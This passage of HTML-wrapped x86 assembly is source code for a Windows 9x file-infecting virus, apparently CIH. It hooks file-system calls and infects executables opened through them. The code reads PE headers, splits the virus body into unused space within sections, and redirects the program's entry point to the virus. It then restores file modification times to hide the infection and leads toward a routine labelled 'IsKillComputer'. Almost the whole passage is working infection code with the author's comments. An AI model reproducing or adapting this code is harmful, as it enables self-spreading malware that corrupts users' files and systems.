; * EBP = D600h ==> Read Data in File * <br>
; ************************************* <br>
; * Stack Dump : * <br>
; * * <br>
; * ESP => ------------------------- * <br>
; * | EFLAG(CF=0) | * <br>
; * ------------------------- * <br>
; * | FileNameBufferPointer | * <br>
; * ------------------------- * <br>
; * | EDI | * <br>
; * ------------------------- * <br>
; * | ESI | * <br>
; * ------------------------- * <br>
; * | EBP | * <br>
; * ------------------------- * <br>
; * | ESP | * <br>
; * ------------------------- * <br>
; * | EBX | * <br>
; * ------------------------- * <br>
; * | EDX | * <br>
; * ------------------------- * <br>
; * | ECX | * <br>
; * ------------------------- * <br>
; * | EAX | * <br>
; * ------------------------- * <br>
; * | Return Address | * <br>
; * ------------------------- * <br>
; ************************************* </p>
<p>push ebx ; Save File Handle </p>
<p>push 00h ; Set VirusCodeSectionTableEndMark </p>
<p>; *************************** <br>
; * Let's Set the * <br>
; * Virus' Infected Mark * <br>
; *************************** </p>
<p>push 01h ; Size <br>
push edx ; Pointer of File <br>
push edi ; Address of Buffer </p>
<p>; *************************** <br>
; * Save ESP Register * <br>
; *************************** </p>
<p>mov dr1, esp </p>
<p>; *************************** <br>
; * Let's Set the * <br>
; * NewAddressOfEntryPoint * <br>
; * ( Only First Set Size ) * <br>
; *************************** </p>
<p>push eax ; Size </p>
<p>; *************************** <br>
; * Let's Read * <br>
; * Image Header in File * <br>
; *************************** </p>
<p>mov eax, ebp <br>
mov cl, SizeOfImageHeaderToRead <br>
add edx, 07h ; Move EDX to NumberOfSections <br>
call edi ; VXDCall IFSMgr_Ring0_FileIO </p>
<p>; *************************** <br>
; * Let's Set the * <br>
; * NewAddressOfEntryPoint * <br>
; * ( Set Pointer of File, * <br>
; * Address of Buffer ) * <br>
; *************************** </p>
<p>lea eax, (AddressOfEntryPoint-@8)[edx] <br>
push eax ; Pointer of File </p>
<p>lea eax, (NewAddressOfEntryPoint-@8)[esi] <br>
push eax ; Address of Buffer </p>
<p>; *************************** <br>
; * Move EDX to the Start * <br>
; * of SectionTable in File * <br>
; *************************** </p>
<p>movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi] <br>
lea edx, [eax+edx+12h] </p>
<p>; *************************** <br>
; * Let's Get * <br>
; * Total Size of Sections * <br>
; *************************** </p>
<p>mov al, SizeOfScetionTable </p>
<p>; I Assume NumberOfSections <= 0ffh <br>
mov cl, (NumberOfSections-@8)[esi] </p>
<p>mul cl </p>
<p>; *************************** <br>
; * Let's Set Section Table * <br>
; *************************** </p>
<p>; Move ESI to the Start of SectionTable <br>
lea esi, (StartOfSectionTable-@8)[esi] </p>
<p>push eax ; Size <br>
push edx ; Pointer of File <br>
push esi ; Address of Buffer </p>
<p>; *************************** <br>
; * The Code Size of Merge * <br>
; * Virus Code Section and * <br>
; * Total Size of Virus * <br>
; * Code Section Table Must * <br>
; * be Small or Equal the * <br>
; * Unused Space Size of * <br>
; * Following Section Table * <br>
; *************************** </p>
<p>inc ecx <br>
push ecx ; Save NumberOfSections+1 </p>
<p>shl ecx, 03h <br>
push ecx ; Save TotalSizeOfVirusCodeSectionTable </p>
<p>add ecx, eax <br>
add ecx, edx </p>
<p>sub ecx, (SizeOfHeaders-@9)[esi] <br>
not ecx <br>
inc ecx </p>
<p>cmp cx, small CodeSizeOfMergeVirusCodeSection <br>
jl short OnlySetInfectedMark </p>
<p>; *************************** <br>
; * Save Original * <br>
; * Address of Entry Point * <br>
; *************************** </p>
<p>; Save My Virus First Section Code <br>
; Size of Following Section Table... <br>
; ( Not Include the Size of Virus Code Section Table ) <br>
push ecx </p>
<p>xchg ecx, eax ; ECX = Size of Section Table </p>
<p>mov eax, (AddressOfEntryPoint-@9)[esi] <br>
add eax, (ImageBase-@9)[esi] <br>
mov (OriginalAddressOfEntryPoint-@9)[esi], eax </p>
<p>; *************************** <br>
; * Read All Section Tables * <br>
; *************************** </p>
<p>mov eax, ebp <br>
call edi ; VXDCall IFSMgr_Ring0_FileIO </p>
<p>; *************************** <br>
; * Let's Set Total Virus * <br>
; * Code Section Table * <br>
; *************************** </p>
<p>; EBX = My Virus First Section Code <br>
; Size of Following Section Table <br>
pop ebx <br>
pop edi ; EDI = TotalSizeOfVirusCodeSectionTable <br>
pop ecx ; ECX = NumberOfSections+1 </p>
<p>push edi ; Size </p>
<p>add edx, eax <br>
push edx ; Pointer of File </p>
<p>add eax, esi </p>
<p>; Modify the Bug that WinZip Self-Extractor Occurs Error... <br>
; So When Open WinZip Self-Extractor, My Virus Don't Infect it... <br>
; The WinZip Self-Extractor Last Section Name is '_winzip_' <br>
; I Just Only Test Last Four Bytes ==> 'zip_' <br>
cmp dword ptr [eax-SizeOfScetionTable+04h], '_piz' <br>
je OnlySetInfectedMark </p>
<p>push eax ; Address of Buffer </p>
<p>; *************************** <br>
; * Set the First Virus * <br>
; * Code Section Size in * <br>
; * VirusCodeSectionTable * <br>
; *************************** </p>
<p>lea eax, [eax+edi-04h] <br>
mov [eax], ebx </p>
<p>; *************************** <br>
; * Let's Set My Virus * <br>
; * First Section Code * <br>
; *************************** </p>
<p>push ebx ; Size </p>
<p>add edx, edi <br>
push edx ; Pointer of File </p>
<p>lea edi, (MyVirusStart-@9)[esi] <br>
push edi ; Address of Buffer </p>
<p>; *************************** <br>
; * Let's Modify the * <br>
; * AddressOfEntryPoint to * <br>
; * My Virus Entry Point * <br>
; *************************** </p>
<p>mov (NewAddressOfEntryPoint-@9)[esi], edx </p>
<p>; *************************** <br>
; * Setup Initial Data * <br>
; *************************** </p>
<p>lea edx, [esi-SizeOfScetionTable] <br>
mov ebp, offset VirusSize </p>
<p>jmp StartToWriteCodeToSections </p>
<p>; *************************** <br>
; * Write Code to Sections * <br>
; *************************** </p>
<p>LoopOfWriteCodeToSections: </p>
<p>add edx, SizeOfScetionTable </p>
<p>mov ebx, (SizeOfRawData-@9)[edx] <br>
sub ebx, (VirtualSize-@9)[edx] <br>
jbe EndOfWriteCodeToSections </p>
<p>push ebx ; Size </p>
<p>sub eax, 08h <br>
mov [eax], ebx </p>
<p>mov ebx, (PointerToRawData-@9)[edx] <br>
add ebx, (VirtualSize-@9)[edx] <br>
push ebx ; Pointer of File </p>
<p>push edi ; Address of Buffer </p>
<p>mov ebx, (VirtualSize-@9)[edx] <br>
add ebx, (VirtualAddress-@9)[edx] <br>
add ebx, (ImageBase-@9)[esi] <br>
mov [eax+4], ebx </p>
<p>mov ebx, [eax] <br>
add (VirtualSize-@9)[edx], ebx </p>
<p>; Section contains initialized data ==> 00000040h <br>
; Section can be Read. ==> 40000000h <br>
or (Characteristics-@9)[edx], 40000040h </p>
<p>StartToWriteCodeToSections: </p>
<p>sub ebp, ebx <br>
jbe SetVirusCodeSectionTableEndMark </p>
<p>add edi, ebx ; Move Address of Buffer </p>
<p>EndOfWriteCodeToSections: </p>
<p>loop LoopOfWriteCodeToSections </p>
<p>; *************************** <br>
; * Only Set Infected Mark * <br>
; *************************** </p>
<p>OnlySetInfectedMark: <br>
mov esp, dr1 </p>
<p>jmp WriteVirusCodeToFile </p>
<p>; *************************** <br>
; * Set Virus Code * <br>
; * Section Table End Mark * <br>
; *************************** </p>
<p>SetVirusCodeSectionTableEndMark: </p>
<p>; Adjust Size of Virus Section Code to Correct Value <br>
add [eax], ebp <br>
add [esp+08h], ebp </p>
<p>; Set End Mark <br>
xor ebx, ebx <br>
mov [eax-04h], ebx </p>
<p>; *************************** <br>
; * When VirusGame Calls * <br>
; * VxDCall, VMM Modifies * <br>
; * the 'int 20h' and the * <br>
; * 'Service Identifier' * <br>
; * to 'Call [XXXXXXXX]'. * <br>
; *************************** <br>
; * Before Writing My Virus * <br>
; * to File, I Must Restore * <br>
; * them First. ^__^ * <br>
; *************************** </p>
<p>lea eax, (LastVxDCallAddress-2-@9)[esi] </p>
<p>mov cl, VxDCallTableSize </p>
<p>LoopOfRestoreVxDCallID: <br>
mov word ptr [eax], 20cdh </p>
<p>mov edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi] <br>
mov [eax+2], edx </p>
<p>movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi] <br>
sub eax, edx </p>
<p>loop LoopOfRestoreVxDCallID </p>
<p>; *************************** <br>
; * Let's Write * <br>
; * Virus Code to the File * <br>
; *************************** </p>
<p>WriteVirusCodeToFile: <br>
mov eax, dr1 <br>
mov ebx, [eax+10h] <br>
mov edi, [eax] </p>
<p>LoopOfWriteVirusCodeToFile: </p>
<p>pop ecx <br>
jecxz SetFileModificationMark </p>
<p>mov esi, ecx <br>
mov eax, 0d601h <br>
pop edx <br>
pop ecx </p>
<p>call edi ; VXDCall IFSMgr_Ring0_FileIO </p>
<p>jmp LoopOfWriteVirusCodeToFile </p>
<p>; *************************** <br>
; * Let's Set CF = 1 ==> * <br>
; * Need to Restore File * <br>
; * Modification Time * <br>
; *************************** </p>
<p>SetFileModificationMark: <br>
pop ebx <br>
pop eax </p>
<p>stc ; Enable CF(Carry Flag) <br>
pushf </p>
<p>; ************************************* <br>
; * Close File * <br>
; ************************************* </p>
<p>CloseFile: <br>
xor eax, eax <br>
mov ah, 0d7h <br>
call edi ; VXDCall IFSMgr_Ring0_FileIO </p>
<p>; ************************************* <br>
; * Need to Restore File Modification * <br>
; * Time !? * <br>
; ************************************* </p>
<p>popf <br>
pop esi <br>
jnc IsKillComputer </p>
<p>; ************************************* <br>
; * Restore File Modification Time * <br>
; ************************************* </p>
<p>mov ebx, edi </p>
<p>mov ax, 4303h <br>
mov ecx, (FileModificationTime-@7)[esi] <br>
mov edi, (FileModificationTime+2-@7)[esi] <br>
call ebx ; VXDCall IFSMgr_Ring0_FileIO </p>
<p>; ************************************* <br>
; * Disable OnBusy * <br>
; ************************************* </p>
<p>DisableOnBusy: <br>
dec byte ptr (OnBusy-@7)[esi] ; Disable OnBusy </p>
<p>; ************************************* <br>
; * Call Previous FileSystemApiHook * <br>
; ************************************* </p>
<p>prevhook: <br>
popad </p>
<p>mov eax, dr0 ; <br>
jmp [eax] ; Jump to prevhook </p>
<p>; ************************************* <br>
; * Call the Function that the IFS * <br>
; * Manager Would Normally Call to * <br>
; * Implement this Particular I/O * <br>
; * Request. * <br>
; ************************************* </p>
<p>pIFSFunc: <br>
mov ebx, esp <br>
push dword ptr [ebx+20h+04h+14h] ; Push pioreq <br>